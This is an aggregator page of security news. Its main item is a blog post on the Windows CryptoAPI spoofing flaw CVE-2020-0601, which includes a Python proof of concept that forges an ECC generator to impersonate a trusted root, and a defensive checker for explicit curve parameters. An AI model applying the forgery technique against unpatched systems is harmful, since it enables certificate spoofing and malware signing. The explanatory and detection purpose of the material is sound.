Check Point Research has published its 2020 Cyber Security Report.
The report highlights the main tactics cyber-criminals are using to attack organisations worldwide across all industries and gives cybersecurity professionals and C-Level executives the information they need to protect their organisations from today’s fifth-generation cyber-attacks and threats.
The 2020 Security Report reveals the key attack vectors and techniques observed by Check Point researchers during the past year.
Cryptominers still dominate malware landscape – Even though cryptomining declined during 2019, linked to cryptocurrencies’ fall in value and the closure of the Coinhive operation in March, 38% of companies globally were impacted by crypto-miners in 2019, up from 37% in 2018.
This is because the use of cryptominers remains a low-risk, high-reward activity for criminals.
Botnet armies surge in size – 28% of organisations globally were hit by botnet activity, an increase of over 50% compared with 2018.
Emotet was the most common bot malware used, primarily because of its versatility in enabling malware and spam distribution services.
Other botnet actions such as sextortion email activity and DDoS attacks also rose sharply in 2019.
Targeted ransomware hits hard – While the number of impacted organisations is relatively low, the severity of the attack is much higher – as seen in 2019’s damaging attacks against US city administrations.
Criminals are choosing their ransomware targets carefully, with the aim of extorting the maximum revenue possible.
Mobile attacks decline – 27% of organisations worldwide were impacted by cyber-attacks that involved mobile devices in 2019, down from 33% in 2018.
While the mobile threat landscape is maturing, organisations are also increasingly aware of the threat, and are deploying more protection on mobiles.
The year Magecart attacks became an epidemic – These attacks, which inject malicious code into e-commerce websites to steal customers’ payment data, hit hundreds of sites in 2019, from hotel chains to commerce giants to SMBs, across all platforms.
Rise in cloud attacks – Currently more than 90% of enterprises use cloud services and yet 67% of security teams complain about the lack of visibility into their cloud infrastructure, security, and compliance.
The magnitude of cloud attacks and breaches has continued to grow in 2019.
Misconfiguration of cloud resources is still the number one cause for cloud attacks, but now we also witness an increasing number of attacks aimed directly at cloud service providers.
“2019 presented a complex threat landscape where nation states, cybercrime organisations and private contractors accelerated the cyber arms race, elevating each other’s capabilities at an alarming pace, and this will continue into 2020,” says Check Point Software Technologies Major Intelligence Officer Lotem Finkelsteen.
“Even if an organisation is equipped with the most comprehensive, state-of-the-art security products, the risk of being breached cannot be completely eliminated. Beyond detection and remediation, organisations need to adopt a proactive plan to stay ahead of cybercriminals and prevent attacks.
“Detecting and automatically blocking the attack at an early stage can prevent damage. Check Point’s 2020 Security Report shares what organisations need to look out for, and how they can win the war against cyber-attacks through key best practices.”
Check Point’s 2020 Security Report is based on data from Check Point’s ThreatCloud intelligence, the largest collaborative network for fighting cybercrime, which delivers threat data and attack trends from a global network of threat sensors; on Check Point’s research investigations over the last 12 months; and on a brand new survey of IT professionals and C-level executives that assesses their preparedness for today’s threats.
The report examines the latest emerging threats against various industry sectors, and gives a comprehensive overview of the trends observed in the malware landscape, in emerging data breach vectors, and in nation-state cyber-attacks.
It also includes analysis from Check Point’s thought leaders, to help organisations understand and prepare themselves for today’s and tomorrow’s complex threat landscape.
The post “Check Point report highlights latest cyber-threats worldwide” appeared first on National Cyber Security.
NSA: Microsoft Releases Patch to Fix Latest Windows 10 Vulnerability
NSA discloses a Windows security flaw that leaves more than 900 million devices vulnerable to spoofed digital certificates
The National Security Agency (NSA) isn’t exactly known for wanting to share information about vulnerabilities it discovers. In fact, it kept the Windows SMB flaw behind its EternalBlue exploit a secret for at least five years so it could use it for digital espionage. (At least, you know, until the exploit was eventually leaked by the Shadow Brokers group.)
But maybe they’ve had a change of heart. (If you truly believe that, I have a bridge to sell you.)
The NSA, in an uncharacteristic show of transparency, recently announced a major public key infrastructure (PKI) security issue in Microsoft Windows that has left more than 900 million PCs and servers worldwide vulnerable to spoofing attacks. It is one of many vulnerabilities Microsoft fixed in its January 2020 Patch Tuesday release. Maybe they didn’t want a repeat of the last incident. Whatever the reason, we’re just glad they decided to disclose the flaw.
The risk of this vulnerability boils down to a weakness in a cryptographic application programming interface that ships with Microsoft’s widely used operating systems. But what exactly is this Windows 10 vulnerability? How does it affect your organization? And what can you do to fix it?
Let’s hash it out.
What’s the Situation with This Windows 10 Vulnerability?
Windows 10 has had a rough go of things these past several months in terms of vulnerabilities. In the latest Windows 10 vulnerability news, the NSA disclosed a vulnerability (CVE-2020-0601) in the cryptographic functionality of 32- and 64-bit Windows 10 and of specific versions of Windows Server. The bug lives in the Windows cryptographic application programming interface, known as CryptoAPI (or, as you may know it, the good ol’ Crypt32.dll module), and affects how it validates elliptic curve cryptography (ECC) certificates.
What it does, in a nutshell, is allow an attacker to create websites and software that masquerade as the “real deals” through the use of spoofed digital certificates. A great example of how it works came from security researcher Saleem Rashid, who tweeted images of NSA.gov and GitHub.com getting “Rickrolled.” Essentially, he caused both Edge and Chrome to accept his spoofed sites as the genuine, HTTPS-verified ones.
Although humorous, Rashid’s simulated attacks are a great demonstration of how serious the security flaw is. With a spoofed digital certificate that exploits the flaw in CryptoAPI, anyone can pretend to be anyone, even an official authority.
CryptoAPI is a critical component of Microsoft Windows operating systems. It’s what allows developers to secure their software applications through cryptographic functions. It’s also what validates the legitimacy of software and of secure website connections through the use of X.509 digital certificates (SSL/TLS certificates, code signing certificates, email signing certificates, etc.). So, basically, the vulnerability is a bug in the OS’s mechanism for deciding whether software and emails are trustworthy, and whether secure website connections are legitimate.
So, what the vulnerability does is allow actors to bypass the trust store by using malicious software that is signed with forged/spoofed ECC certificates (doing so makes it look like it was signed by a trusted organization). This means that users would unknowingly download malicious or compromised software because the digital signature would appear to be from a
This vulnerability can cause other issues as well, according to the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA):
“This could deceive users or thwart malware detection methods such as antivirus. Additionally, a maliciously crafted certificate could be issued for a hostname that did not authorize it, and a browser that relies on Windows CryptoAPI would not issue a warning, allowing an attacker to decrypt, modify, or inject data on user connections without detection.”
Does This Mean ECC Is Not Secure?
No. This flaw in no way, shape, or form affects the integrity of ECC certificates or the math behind them. The bug was in how CryptoAPI matched a certificate against a trusted ECC root: it compared the public key point but did not check that the certificate’s curve parameters (in particular the generator, or base point) were the ones the root actually uses. That let an attacker supply explicit curve parameters with a generator chosen so that their own private key “matches” the trusted public key. It does, however, cast a negative light on Windows’ cryptographic application programming interface by shining a spotlight on the shortcomings of its validation process.
Let me reiterate: This is a flaw in Windows CryptoAPI and does not affect the integrity of the ECC certificates themselves. If you’re one of the few using ECC certificates (you know, since RSA is still more commonly used than ECC), this doesn’t impact the security of your certificates or private keys.
The patch from Microsoft addresses the vulnerability to ensure that Windows CryptoAPI fully validates ECC certificates.
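To make concrete why the flaw sits in the validator and not in the curve, here is an added example (not code from the original post, from Microsoft or from the NSA) that reproduces the core of CVE-2020-0601 in pure Python over P-256. The “trusted root” private key d_root, the attacker key d_evil, the ECDSA nonce and the signed message are all made-up constants. The attacker knows only the root’s public key Q, picks a private key d' of their own, and publishes explicit curve parameters whose generator is G' = d'^-1 · Q, so that d' · G' = Q. A validator that matches certificates to cached roots by public key alone accepts the forged parameters and every signature made under them; one that also compares the curve parameters, which is what the patch adds, does not.

```python
"""CVE-2020-0601 curve-parameter confusion, reproduced over P-256 in pure Python.
Added example for this article; all keys, the nonce and the message are made up."""
import hashlib

# P-256 domain parameters (NIST FIPS 186-4)
p = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
a = p - 3
n = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)

def ec_add(P1, P2):
    """Affine point addition on P-256; None is the point at infinity."""
    if P1 is None:
        return P2
    if P2 is None:
        return P1
    x1, y1 = P1
    x2, y2 = P2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                        # P + (-P) = infinity (also covers doubling with y = 0)
    if P1 == P2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def ec_mul(k, pt):
    """Double-and-add scalar multiplication (not constant time; demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc

def ecdsa_sign(priv, msg, gen, k):
    """Textbook ECDSA with an explicit generator and a caller-supplied nonce (fixed here for reproducibility)."""
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % n
    r = ec_mul(k, gen)[0] % n
    s = pow(k, -1, n) * (z + r * priv) % n
    return (r, s)

def ecdsa_verify(pub, msg, sig, gen):
    """Verify with whatever generator the relying party believes the key uses."""
    r, s = sig
    if not (0 < r < n and 0 < s < n):
        return False
    z = int.from_bytes(hashlib.sha256(msg).digest(), "big") % n
    w = pow(s, -1, n)
    X = ec_add(ec_mul(z * w % n, gen), ec_mul(r * w % n, pub))
    return X is not None and X[0] % n == r

# Hypothetical trusted root. The relying party caches only Q_root; d_root is a made-up
# constant standing in for a key the attacker never learns.
d_root = 0x1c3e0fa9d2b45e6670a1b2c3d4e5f60718293a4b5c6d7e8f9a0b1c2d3e4f5061
Q_root = ec_mul(d_root, G)

def forge_generator(root_pub, attacker_priv):
    """G' = attacker_priv^-1 * Q_root, so attacker_priv * G' == Q_root. A CA certificate
    carrying Q_root plus explicit parameters with base point G' then 'has' the trusted key."""
    return ec_mul(pow(attacker_priv, -1, n), root_pub)

def matches_trusted_root_vulnerable(cert_pub, cert_gen):
    """Pre-patch behaviour: only the public key is compared against the cached root."""
    return cert_pub == Q_root

def matches_trusted_root_fixed(cert_pub, cert_gen):
    """Post-patch behaviour: the curve parameters must match the root's too."""
    return cert_pub == Q_root and cert_gen == G

def demo():
    d_evil = 0x7f3a5c9e1b2d4f6081a3c5e7092b4d6f8a1c3e5071b3d5f7092c4e6081a3c5e7
    g_evil = forge_generator(Q_root, d_evil)
    msg = b"constructed TBSCertificate bytes for a leaf with CN=github.com"
    nonce = 0x0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
    sig = ecdsa_sign(d_evil, msg, g_evil, nonce)
    return {
        "key_matches": ec_mul(d_evil, g_evil) == Q_root,               # forged pair reproduces the root key
        "vulnerable_accepts": matches_trusted_root_vulnerable(Q_root, g_evil),
        "fixed_accepts": matches_trusted_root_fixed(Q_root, g_evil),
        "sig_ok_with_forged_params": ecdsa_verify(Q_root, msg, sig, g_evil),
        "sig_ok_with_real_params": ecdsa_verify(Q_root, msg, sig, G),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running `demo()` shows the two behaviours side by side: the public key matches the root either way, a signature made with the attacker’s key verifies whenever the verifier honours the certificate’s own generator, and it fails as soon as the verifier insists on the root’s real parameters. The nonce is fixed only so the output is reproducible; a real signer must draw it from a CSPRNG (or derive it per RFC 6979).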
What This Windows 10 Vulnerability Means for Your Organization
Basically, this cryptographic validation security flaw impacts both SSL/TLS connection validation and Windows Authenticode file validation. Malicious actors who exploit the CryptoAPI vulnerability could use it to:
- defeat trusted network connections to carry out man-in-the-middle (MitM) attacks and compromise confidential information;
- deliver malicious executable code that appears to be signed by a trusted publisher;
- present a maliciously crafted certificate for a hostname that never authorized it, without any warning from browsers that rely on CryptoAPI; and
- appear as legitimate and trusted entities (through spoofing) to get users to engage with and download malicious content via email and phishing websites.
The NSA press release states:
“NSA assesses the vulnerability to be severe and that sophisticated cyber actors will understand the underlying flaw very quickly and, if exploited, would render the previously mentioned platforms as fundamentally vulnerable. The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners.”
Steps to Take to Mitigate This Bug
Wondering what you should do to mitigate the threat on your network and devices? The NSA has a few recommendations:
Get to Patchin’ ASAP
The NSA recommends installing a newly-released patch from Microsoft for Windows 10 operating systems and Windows Server (versions 2016 and 2019) as soon as possible on all endpoints and systems. Like, right now. Get to it! As a best practice, you also can turn on automatic updates to ensure that you don’t miss key updates in the future.
According to Microsoft’s Security Update Guide:
“After the applicable Windows update is applied, the system will generate Event ID 1 in the Event Viewer after each reboot under Windows Logs/Application when an attempt to exploit a known vulnerability ([CVE-2020-0601] cert validation) is detected.”
Here at The SSL Store, we’ve already rolled out the patch to ensure that all of our servers and endpoint devices are protected. (Thanks, Ross!) Rolling out these kinds of updates is something you don’t want to wait around to do because it leaves your operating systems — and everything else as a result — vulnerable to spoofing and phishing attacks using spoofed digital certificates.
Prioritize Your Patching Initiatives
But what if you’re a major enterprise that can’t just get it done with a snap of the fingers? (Yeah, we know how you big businesses sometimes like to do things.) In that case, the NSA recommends patching first the endpoints that provide essential or broadly relied-upon services and those most exposed to attack: mission-critical systems and infrastructure, internet-facing systems, and networked servers.
Implement Network Prevention and Detection Measures
For those of you who route your traffic through proxy devices, we have some good news. While your endpoints are getting patched, properly configured TLS inspection proxies can help: because they validate SSL/TLS certificates from third parties themselves and decide whether to trust or reject them, they can stop forged chains before they reach vulnerable endpoints. The caveat is that the proxy’s own validation must not depend on an unpatched Windows CryptoAPI, so patch it first.
You also can review logs and packet captures to extract the certificates presented to your hosts and check them for malicious or suspicious properties.
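The proxy-side check described above, as an added example that is not part of the original post or of any vendor’s product: a DER-level classifier that a TLS inspection proxy or a packet-analysis script can run on the SubjectPublicKeyInfo of every certificate in a presented chain. Exploiting CVE-2020-0601 requires a certificate that spells out its curve with explicit ECParameters (that is how the attacker supplies a chosen generator), while RFC 5480 requires PKIX certificates to use a namedCurve OID and forbids the explicit and implicit forms, so explicit parameters are a rejection signal with essentially no legitimate false positives. The three sample SPKIs are constructed inside the code; they are not real certificates, and the RSA key material is a placeholder.

```python
"""Flag EC SubjectPublicKeyInfo structures that carry explicit curve parameters.
Added example for this article; the sample inputs below are constructed, not real certificates."""

ID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")      # 1.2.840.10045.2.1 id-ecPublicKey
ID_PRIME_FIELD   = bytes.fromhex("2a8648ce3d0101")      # 1.2.840.10045.1.1 prime-field
ID_RSA           = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1 rsaEncryption
NAMED_CURVES = {
    bytes.fromhex("2a8648ce3d030107"): "P-256",  # 1.2.840.10045.3.1.7
    bytes.fromhex("2b81040022"): "P-384",        # 1.3.132.0.34
    bytes.fromhex("2b81040023"): "P-521",        # 1.3.132.0.35
}

def read_tlv(buf, pos=0):
    """Parse one DER TLV (definite lengths only). Returns (tag, value, position after it)."""
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                                # long form: low 7 bits = number of length octets
        count = ln & 0x7f
        ln = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    if pos + ln > len(buf):
        raise ValueError("DER length runs past end of buffer")
    return tag, buf[pos:pos + ln], pos + ln

def encode_tlv(tag, value):
    """Minimal DER encoder, used here only to build the sample inputs."""
    ln = len(value)
    if ln < 0x80:
        return bytes([tag, ln]) + value
    lb = ln.to_bytes((ln.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def classify_ec_params(spki_der):
    """Return 'not-ec', 'named:<curve>', 'explicit', 'implicit', 'missing' or 'unknown'."""
    tag, spki, _ = read_tlv(spki_der)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    tag, algid, _ = read_tlv(spki)               # AlgorithmIdentifier comes first
    if tag != 0x30:
        raise ValueError("AlgorithmIdentifier must be a SEQUENCE")
    tag, oid, pos = read_tlv(algid)
    if tag != 0x06 or oid != ID_EC_PUBLIC_KEY:
        return "not-ec"
    if pos >= len(algid):
        return "missing"
    ptag, pval, _ = read_tlv(algid, pos)
    if ptag == 0x06:                             # namedCurve OID: the only form RFC 5480 permits
        return "named:" + NAMED_CURVES.get(pval, "unknown")
    if ptag == 0x30:                             # specifiedCurve: attacker-chosen field, a, b, base point, order
        return "explicit"
    if ptag == 0x05:                             # implicitCurve NULL
        return "implicit"
    return "unknown"

def should_reject(spki_der):
    """Policy a proxy could enforce on every certificate in a chain: EC keys must name their curve."""
    kind = classify_ec_params(spki_der)
    return not (kind == "not-ec" or kind.startswith("named:"))

# ---- constructed sample inputs ----
P256_P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
P256_B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
P256_N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5

def _int(v):   # DER INTEGER; the +8 keeps a leading 0x00 when the top bit is set
    return encode_tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))

def _oct(b):   # DER OCTET STRING
    return encode_tlv(0x04, b)

PUBKEY = encode_tlv(0x03, b"\x00\x04" + GX.to_bytes(32, "big") + GY.to_bytes(32, "big"))

# Conformant: id-ecPublicKey with namedCurve P-256
SAMPLE_NAMED = encode_tlv(0x30,
    encode_tlv(0x30, encode_tlv(0x06, ID_EC_PUBLIC_KEY) + encode_tlv(0x06, bytes.fromhex("2a8648ce3d030107")))
    + PUBKEY)

# Suspicious: the same key, but the curve is spelled out, so the base point is whatever the issuer wrote
_EXPLICIT = (_int(1)                                                              # version ecpVer1
    + encode_tlv(0x30, encode_tlv(0x06, ID_PRIME_FIELD) + _int(P256_P))           # fieldID
    + encode_tlv(0x30, _oct((P256_P - 3).to_bytes(32, "big")) + _oct(P256_B.to_bytes(32, "big")))  # curve {a, b}
    + _oct(b"\x04" + GX.to_bytes(32, "big") + GY.to_bytes(32, "big"))              # base point (attacker-controlled)
    + _int(P256_N))                                                               # order
SAMPLE_EXPLICIT = encode_tlv(0x30,
    encode_tlv(0x30, encode_tlv(0x06, ID_EC_PUBLIC_KEY) + encode_tlv(0x30, _EXPLICIT))
    + PUBKEY)

# Not EC: rsaEncryption with NULL parameters (placeholder key bits)
SAMPLE_RSA = encode_tlv(0x30,
    encode_tlv(0x30, encode_tlv(0x06, ID_RSA) + encode_tlv(0x05, b""))
    + encode_tlv(0x03, b"\x00" + bytes(8)))

if __name__ == "__main__":
    for label, spki in (("named", SAMPLE_NAMED), ("explicit", SAMPLE_EXPLICIT), ("rsa", SAMPLE_RSA)):
        print(f"{label}: {classify_ec_params(spki)} reject={should_reject(spki)}")
```

Feed `classify_ec_params` the DER SubjectPublicKeyInfo of each certificate a client is offered (from the proxy’s certificate hook, or carved out of a packet capture) and treat `explicit` and `implicit` as a hard failure rather than a warning; on an unpatched Windows host the same structure is exactly what lets a forged chain pass.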
*** This is a Security Bloggers Network syndicated blog from Hashed Out by The SSL Store authored by Casey Crane. Read the original post at: https://www.thesslstore.com/blog/nsa-microsoft-releases-patch-to-fix-latest-windows-10-vulnerability/
Source: National Cyber Security – Produced By Gregory Evans Another day and another clever PayPal phishing scam to learn from to better protect yourself and your organization. “In this world, nothing can be said to be certain, except death, taxes, and PayPal phishing email scams,” said Benjamin Franklin. Don’t believe me? Google yourself. Okay, okay, he […]
Privileged Access Abuse at the Heart of Latest Malicious Insider Incidents
While many companies spend a lot of energy protecting their business from external threats, security events initiated by insiders can be just as costly. Malicious insiders not only have intimate knowledge of corporate systems and infrastructure, but they also have something far more powerful: legitimate privileged […]
The Institute of Electrical and Electronics Engineers recently announced its 2020 IEEE Fellows, with numerous Indian American and South Asian-origin engineers making the cut. IEEE Fellowships are conferred by the IEEE Board of Directors upon a person with an outstanding record of accomplishments. The total number […]
METAIRIE, La. (AP) — Authorities in Louisiana say a woman has been arrested for pretending to be an attorney and stealing $2 million from a client with special needs. Kristina Galjour was arrested Thursday and charged with bank fraud, computer fraud, theft valued over $25,000, exploitation of the infirm and illegally practicing law without a license. The 57-year-old victim has a developmental disability and inherited a trust fund after his parents died. Jefferson Parish Sheriff’s Capt. Jason Rivarde says Galjour coerced the man into thinking she was an attorney and over a three-year period she emptied his $2 million trust fund. The investigation is ongoing. It’s unclear whether Galjour has an attorney.
Bringing a consistent form of dark mode is not an easy task, as the existing implementations are very much fragmented. Even the apps from Google don’t have a standard way to toggle the color scheme – some rely on underlying system settings while others sport a […]
TCL Communication Technology Holding Ltd., the operator of the BlackBerry Mobile site, is the latest victim of cryptocurrency-loving hackers in the latest of a rash of cryptomining hijacking cases.
The website for BlackBerry Mobile was discovered by a Reddit user last week to be serving up code to visitors from Coinhive, the notorious Monero mining script service. The same person who discovered the code did note that only the global TCL-owned Blackberrymobile.com site was affected, not country-specific sites or those owned by BlackBerry Ltd.
Coinhive itself chimed in on Reddit, saying that one of its users had hacked the Blackberry Mobile website using a vulnerability in the Magento webshop software. “We’re sorry to hear that our service has been misused,” the company said. “This specific user seems to have exploited a security issue in the Magento webshop software (and possibly others) and hacked a number of different sites. We have terminated the account in question for violating our terms of service now.”
TCL is far from the first company to be targeted by cryptomining code, and it won’t be the last. The first outbreaks of cryptomining-related hacking occurred in September, when The Pirate Bay and then Showtime were exposed as using the method. As cryptocurrencies boomed, so did instances of hackers and site owners trying to cash in on Monero mining. A RiskIQ report Sept. 26 found that more than 1,000 sites were hijacking the computing power of site visitors to mine for cryptocurrencies.
By October, leading content delivery network Cloudflare Inc. was the first major provider to crack down on the method, banning all sites from its network that have cryptocurrency mining code installed.
The method spread to apps later the same month, when the first reports emerged of Coinhive scripts appearing in Android apps, and the new attack vector has seemingly continued to grow. Only this weekend, a security researcher discovered 291 apps across third-party Android stores that included the mining code, although they appear to be the same app and code under 291 different names.
Commenting on the Android outbreak, HackRead noted that though the biggest victims of cryptocurrency miners were previously website owners and unsuspecting visitors, now Android users are also at risk. The advice, as always, is to practice safe internet: Do not download unknown apps from Android stores, make sure they have up-to-date antivirus software installed and keep an eye on their processor usage because cryptocurrency miners trigger high usage.
The post “BlackBerry Mobile site the latest target of cryptocurrency mining hackers” appeared first on National Cyber Security Ventures.
We hear it all the time: A celebrity’s been hacked. Their private photos leaked. Now there are hackers preying on everyone’s fear that this could happen, using one of the most trusted names in technology. An urgent warning coming tonight from Charlotte’s Better Business Bureau with what you need to…
Without a doubt, hoverboards are the latest fad. Hoverboards are indeed very useful as these aren’t only easy to use but make traveling so much fun. The recent trend of trying to make every device internet connected has not spared hoverboards; they even come with rider applications. The app allows…
The post Remotely Controllable Hoverboards Latest Target of Hackers appeared first on National Cyber Security Ventures.